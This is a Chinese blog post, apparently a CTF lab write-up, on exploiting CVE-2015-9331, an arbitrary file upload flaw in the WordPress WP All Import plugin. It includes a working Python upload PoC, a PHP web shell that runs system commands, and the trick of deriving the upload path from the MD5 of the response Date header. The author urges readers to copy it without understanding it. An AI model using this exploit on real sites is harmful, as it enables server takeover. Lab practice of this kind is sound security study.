【春秋云镜】CVE-2015-9331 必获取flag,来抄

最新推荐文章于 2024-11-16 10:21:13 发布
最新推荐文章于 2024-11-16 10:21:13 发布
阅读量828 收藏 7
点赞数 5
分类专栏: 靶场WP 文章标签: 安全漏洞 web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/135954105
版权
文章描述了一款WordPress插件WPAllImportv3.2.3存在的安全漏洞,可通过任意文件上传植入shell脚本。攻击者利用POC上传恶意文件,并通过HTTP头信息获取文件上传时间,最后提供了一个修改后的POC示例。
摘要由CSDN通过智能技术生成

靶场简介

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。

网上公开的POC

#/usr/local/bin/python3

 -*-coding:utf-8-*-
 
import requests,os
site="URL"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

shell.php内容:

<?php
system('cat /flag');phpinfo();
?>

其中

up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()

这段代码是Python代码,其中使用了os.popen来执行一个命令行命令:
up_req.headers[‘date’]: 这是从up_req.headers字典中获取键为’date’的值。这很可能是HTTP请求的头部信息中的日期。
strtotime(‘’+up_req.headers[‘date’]+‘’): 这里使用了PHP的strtotime函数来将获取到的日期字符串转化为时间戳。
php -r “print md5(strtotime(‘’+up_req.headers[‘date’]+‘’));”: 这是一个PHP命令行指令,它会计算上述日期字符串的时间戳的MD5哈希值并打印出来。
os.popen(‘…’).read(): 使用Python的os.popen方法执行上述PHP命令,并读取其输出。

因为春秋云镜原因,为了让大家已学习为目的,修改了靶场上传
所以只允许以下文件上传
在这里插入图片描述

修改后的POC

上传webshel后,获取当前上传时间

import requests,os
import hashlib  
from datetime import datetime 
site="URL"
file_to_upload ='shell.zip'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
print(up_req.headers['date'])

在这里插入图片描述
使用在线PHP执行工具,生成时间戳

Wed, 31 Jan 2024 07:14:49 GMT
在这里插入图片描述
得到+8时的北京时间时间戳和他的MD5值。

(因为大部分人过不去的原因,我猜可能是因为自己的系统没有PHP的函数,所以无法执行脚本)

http://eci-2ze96rpujhdxmjrfyixm.cloudeci1.ichunqiu.com/wp-content/uploads/wpallimport/uploads/替换这里/evil.php
在这里插入图片描述

抄吧脚本小子,反正我也不知道原理。
关注都关注了,就别取消了。

HMX404
关注
专栏目录
CVE10大漏洞总结【网络安全】
heikeyouyou的博客
05-19 3304
网络安全之cve十大漏洞总结
春秋云镜CVE-2024-0195【记录】
zhiquovo的博客
03-07 1079
春秋云镜CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 2558
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋云镜 CVE-2015-9331
qq_22002773的博客
09-12 909
春秋云镜 CVE-2015-9331
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
CVE-2015-5119_walkthrough
vulfocus——apache(cve_2021_41773)
m0_62063669的博客
09-22 1108
攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
daxi0ng的博客
09-25 2105
0x00 简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案! 0x01 漏洞概述 安全人员进行调查时,很快发现WordPress插件.
wordpress数据导入插件WP ALL Import使用教程
ChanYao的专栏
02-24 4648
当你要迁移站点,或者出于某种原因,需要把数据导入到wordpress的时候,而且这个数据量还非常多的时候,wordpress自带的导出导入工具用起来就不太方便了。 假如你采集了成千上万条数据,且存在了excle表格里面,你想把它导入到文章里面,辣么接下来介绍的方法和插件正和你意:wp-all-import-pro插件。 我曾经用这个插件把excel里面的14万行数据导入到wordpress的文章里面, 它支持XML和CVS文件直接导入,说到这里是不是很熟悉了,CVS格式的文件,就是表格。 ..
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 1317
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋云镜 CVE-2019-16113
qq_22002773的博客
08-24 938
春秋云镜 CVE-2019-16113
春秋云镜 CVE-2022-22947
qq_22002773的博客
07-18 487
春秋云镜 CVE-2022-22947
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 297
个人记录(新手小白)春秋云镜CVE的复现过程
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4000
CVE-2022-22965 Spring远程代码执行漏洞复现
Weblogic 任意文件上传漏洞(CVE-2018-2894)复现
qq_53105813的博客
01-12 1886
Weblogic 任意文件上传漏洞(CVE-2018-2894)复现
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3313
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
推荐15个2024最新精选wordpress模板
最新发布
jianzhanyes的博客
11-16 957
英文wordpress模板,适合B2C网站搭建,功能强大且兼容性好,是许多专业外贸网站的首选。绿色的亚马尔Yamal外贸独立站wordpress模板,适用于外贸公司建独立站的wordpress主题。适合工业、制造业企业官网使用的wordpress模板,简洁实用、后台通过主题选项管理,操作便捷。国潮好物,配国产主题,为中国制造加油、助力,适合生产、加工、制造业官网的WordPress主题。制造业wordpress网站模板,适合生产制造企业官方网站使用的wordpress外贸主题。
RabbitMQ 与 PHP Swoole 实现
学习,分享一直在路上
11-12 1264
RabbitMQ 是一个开源的消息队列中间件,允许通过异步消息传递来解耦应用程序的各个部分。Swoole 是一个高性能的 PHP 扩展,支持异步编程和协程,适用于构建高并发的网络服务。将 RabbitMQ 与 Swoole 结合使用,可以构建高效、可扩展的应用程序。本文将介绍如何使用 RabbitMQ 和 PHP Swoole 实现一个简单的消息队列示例。使用 Docker 快速启动 RabbitMQ 实例
C语言入门到精通(第六版)——第十六章
qq_63485530的博客
11-14 1090
3、本地网络上的其他主机接收到ARP请求帧后,检查是否与自己的IP地址匹配,如果不匹配,则丢弃APR请求帧,如果主机B发现与自己的IP地址匹配,则将主机A的物理地址和IP地址添加到自己的ARP缓存中,然后主机B将自己的物理地址和IP地址发送给主机A,当主机A接收到主机B发来的信息后,将用这些信息更新ARP缓存。在发送数据时,应用层的数据传输到传输层,加上TCP的首部,数据就构成了报文。简单来说,套接字就是一个假想的连接装置,其作用类似于插座,插座用于连接电器和电线,套接字用于连接程序和网络,完成通信功能。
C03S05-PLinux网络之自动装机
Lin_Nong的博客
11-15 987
PXE( Preboot execution Environment,预启动执行环境 )是一种允许计算机通过网络安装操作系统的技术。PXE也是C/S架构,允许客户端通过网络从服务端下载引导镜像,并加载安装文件或整个操作系统。
CVE-2022-22909
07-29
CVE-2022-22909是一个安全漏洞,具体细节可以在官方链接中找到\[1\]。根据引用\[2\]中的内容,这个漏洞可以通过执行特定的命令来实现远程命令执行。引用\[3\]中提供了一个示例的exploit.py脚本,可以利用该漏洞获取flag。 #### 引用[.reference_title] - *1* *2* [【春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128208529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [春秋云镜 CVE-2022-22909](https://blog.csdn.net/qq_22002773/article/details/131790209)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值